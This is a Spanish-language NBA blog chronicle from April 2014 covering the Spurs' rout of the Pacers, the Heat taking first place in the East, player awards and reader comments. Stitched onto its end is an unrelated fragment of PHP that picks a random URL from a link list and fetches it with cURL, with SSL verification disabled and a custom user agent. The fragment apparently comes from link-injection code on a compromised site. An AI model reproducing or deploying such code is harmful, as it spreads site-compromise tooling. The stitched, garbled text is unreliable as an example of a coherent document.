La Crónica: Cambio de líder

01 de April de 2014 por Simon

Hoy es la primera vez en lo que llevamos de temporada en la que si miramos el puesto más alto de la clasificación del Este no encontramos a Indiana. Su bajón tras el All-Star no podía quedarse sin consecuencias y si han tardado más de lo previsto en caer ha sido porque sus rivales no están muy allá tampoco. Los Pacers recibieron ayer un serio correctivo en su propia casa, aunque en defensa de Paul George y compañía podríamos decir que se enfrentaban al equipo más en forma de la competición y, viendo como están unos y otros, al máximo favorito al anillo. El partido tuvo bien poca historia. San Antonio dominó a los locales desde el mismísimo salto inicial  como si de un equipo de lotería se tratara. En el segundo cuarto Duncan y compañía llegaron a doblar en el marcador a los de Frank Vogel que no fueron capaces en ningún momento de reducir la diferencia por debajo de la decena debido en buena parte a su triste 37% de acierto en lanzamientos, una cifra que desde hace un tiempo es demasiado habitual en Indiana. En el último cuarto, los Spurs se gustaron mareando a la defensa de Indiana y la diferencia se disparó por encima de los 25 puntos. Como ya avisábamos, muy poquita historia tuvo el partido (103-77). Con esta victoria San Antonio acumula ya 18 consecutivas lo que supone un nuevo récord para la franquicia, récord que no les resultará fácil ampliar demasiado pues en breve reciben a Golden State Warriors y visitan a Oklahoma City en días consecutivos y por si fuera poco dos días después visitan la cancha de los necesitados Grizzlies. Aunque vete a saber, con  este equipo nunca dejas de sorprenderte.

La derrota de los Pacers fue por fin aprovechada por los Miami Heat, que se auparon al liderato del Este venciendo a los Raptors después de un partido igualado en el que los campeones no consiguieron destacarse en el marcador hasta el inicio del tercer cuarto. Aún así los Raptors no habían dicho la última palabra y liderados por el venezolano Greivis Vásquez consiguieron reducir la ventaja a escasos tres puntos lo que espoleó a los dormidos Heat que apretaron en defensa de nuevo y rápidamente recuperaron su plácida ventaja (83-93). Mala jornada para los canadienses que además de perder vieron como su máximo rival en la clasificación, los Chicago Bulls, les empataban ganando a los Celtics gracias a una enorme defensa en el último cuarto (80-94). 

En el Oeste, en cambio, pocos capos entraban en acción. Además de los ya comentados San Antonio Spurs sólo los Clippers jugaron y lo hicieron sin Blake Griffin, baja tras su lesión de espalda en el partido anterior. De todas maneras, sus compañeros no tuvieron excesivos problemas para derrotar a los Wolves con un tercer cuarto en el que arrasaron a los de Adelman y rompieron la igualdad imperante hasta el momento. En el último cuarto la relajación de los Clippers hizo que los suplentes de Minnesota pudieran maquillar el marcador (114-104). No hemos considerado a los Grizzlies como capo de la conferencia a pesar de que gracias a su victoria sobre los Nuggets (94-92) vuelven a  estar en puestos de postemporada igualados con Suns y Mavericks. Ganaron sufriendo mucho. Con 3 arriba y sólo 8 segundos por jugar, Denver escogió la peor opción para igualar el partido:  Mozgov se tiró un triple cuando aún quedaban muchos segundos para darle el balón a compañeros más capacitados para la causa. La bronca que le debió caer al volver a los vestuarios debió ser fina…

Volvemos al Este para comentar la espectacular remontada de los Bobcats sobre los Wizards en el último cuarto. Los Wizards dominaban el encuentro con autoridad hasta que los Bobcats entraron en trance y lograron remontar toda la desventaja que arrastraban desde el segundo cuarto. Incluso les dio tiempo a no pasar apuros en el último minuto (94-100). A pesar de esta victoria va a ser complicado que los Bobcats alcancen la sexta plaza de la conferencia pues a falta de 8 partidos tiene una desventaja de dos precisamente con los Wizards. Sin embargo, aún les queda un duelo directo esta temporada que podría decidir el sexto puesto del Este.

En el resto de partidos de la jornada,  tanto Atlanta como Knicks cumplieron con su deber y lograron las victorias que mantienen las cosas como estaban al borde del abismo de los Play Off en el Este. Los Hawks se deshicieron de los Sixers con un enorme Millsap (95-103) y los Knicks  vencieron sin problemas en la cancha de los Jazz  con un descafeinado último cuarto en el que ningún equipo parecía capaz de anotar (92-83). En los duelos sin miga de la jornada, los Kings ganaron a los Pelicans con una exhibición de Cousins (102-97) y los Pistons se curaron de la vergüenza que es que te ganen los Sixers venciendo a los Bucks (111-116).

PREMIOS

MVP: Por fin una gran actuación de Demarcus Cousins obtiene el premio de la victoria. Esta vez sus 35 puntos, 14 rebotes y 2 tapones sí que sirvieron para imponerse a buen equipo como son los Pelicans.

Rookie: Ray McCallum se hinchó de minutos por la baja de Thomas y consiguió su primer doble-doble de la temporada: 22 puntos y 10 asistencia. Y además sólo cometió una pérdida.

Sorpresa: Louis Williams se fue hasta los 22 puntos (11 en el último cuarto) ante su ex equipo. También consiguió 5 rebotes y 5 asistencias, todo en apenas 25 minutos.

Decepción: Horrible partido de John Wall justo cuando se enfrentaba a un rival directo en la clasificación. 10 puntos (4 de 16) y 5 pérdida, nada más y nada menos.

Esfuerzo en vano: No sé si vale la pena nombrar a un jugador de los Sixers en este apartado pero de todas manera hay que decir que Thaddeus Young consiguió 23 puntos y robó 4 balones. Anthony Davis se fue a los 22 puntos, 8 rebotes, 4 asistencias y 4 tapones pero Cousins fue demasiado para él.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Indiana tiene lo que se merece, me encanta el equipo, pero llevan 2 meses jugando de pena. Con más curro tendrían al menos 5 victorias más (no hoy, pero sí partidos como ante los Cavs).

    Ahora a 8 del final se dejan arrebatar el factor cancha… es para matarles. Quizá sí que fue un error sacar Granger (su “líder espiritual” como le llamaron los jugadores) para traer a un Turner que tampoco está haciendo demasiado.

      Citar

  2. Ruxixon dice:
    #2

    ¿Y cuáles son las claves de ese bajón de Indiana?¿Simplemente Granger?

      Citar

  3. Jose Luis dice:
    #3

    No hombre. Evidentemente falta juego en equipo, y que los jugadores exteriores se tiren menos mandarinas. Aunque Hibbert también ha tenido sus días bastante malos, la verdad.

    Pero han tenido derrotas desesperantes vamos… 5 victorias más no me extrañarían.

      Citar

  4. Denise dice:
    #4

    Hay que ver lo poco que están aportando Turner, Bynum & Glen Davis y Granger a sus respectivos equipos. Eran las gangas del Deadline y estaban llamados a ser revulsivos en sus equipos, pero de momento fracaso para los 4.

    Ummm Atlanta.., llevan 2 juegos de ventaja a Knicks y su calendario lo veo mas favorable, pero han necesitado sudar hasta el último segundo y disponer de un superlativo Millsap para doblegar jugando en casa al vertedero de los 76ers. Por sensaciones, los Knicks están mucho mejor en este tramo final de temporada, aunque los Knicks son los Knicks y no pueden fallar a su tradición de franquicia fracasada.

    El tankeo de Boston es para hacerselo mirar, 4-16 su balance desde el All-Star

      Citar

  5. TheDeerHunter dice:
    #5

    El apagón físico es más que evidente y eso se nota especialmente en el perímetro que no le aciertan ni a una vaca con un melón a dos metros. Si el personal puede permitirse cerrarse descaradamente contra Hibbert y West estos tampoco son el dúo interior con más recursos ofensivos de la liga. El resultado es que este mes les está costando pasar de 80 puntos con un juegoabsolutamente plano y eso es de equipo de lotería. Añade que también han bajado el listón defensivo y así se pierden los partidos a puñados.

    Esos traspasos decisivos con los que alabábamos a Bird no han aportado nada. Además se dice por ahí que hay problemas en el vestuario y que Stephenson está metido en todos los fregados.

    No pinta bien para tumbar un campeón, desde luego.

      Citar

  6. GreenPride dice:
    #6

    Del equipo que asombraba a todos al principio de temporada a esta caricatura de equipo, Indiana quien te vió y quien te ve. En los primeros meses de la temporada este partido en San Antonio se resolvió con una gran victoria de los Pacers y un Paul George genial pero ahora todo ha cambiado y los de Indiana a menos de 10 partidos de los Playoffs parecen un equipo acabado. Veremos si es así pero el perder la ventaja campo era cuestión de tiempo y si los Heat no hubieran estado tan lamentables este último mes haría tiempo que estarían por detrás. Una lástima pues son el único equipo que a mi juicio puede hacer frente a los Heat en el Este.
    Y decíamos que todo cambia pero no es verdad… todo cambia menos los Spurs. Equipazo, todos aportan, el ataque mueve la bola increible y de nuevo se postulan como los favoritos del salvaje Oeste para ir a las Finales. Sí, si los favoritos por juego y por aportación de todos sus miembros. Veremos luego en las eliminatorias pero ahora mismo dan miedo los de Pop.

      Citar

  7. Nacho dice:
    #7

    Txusma, también en el mail el Este.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>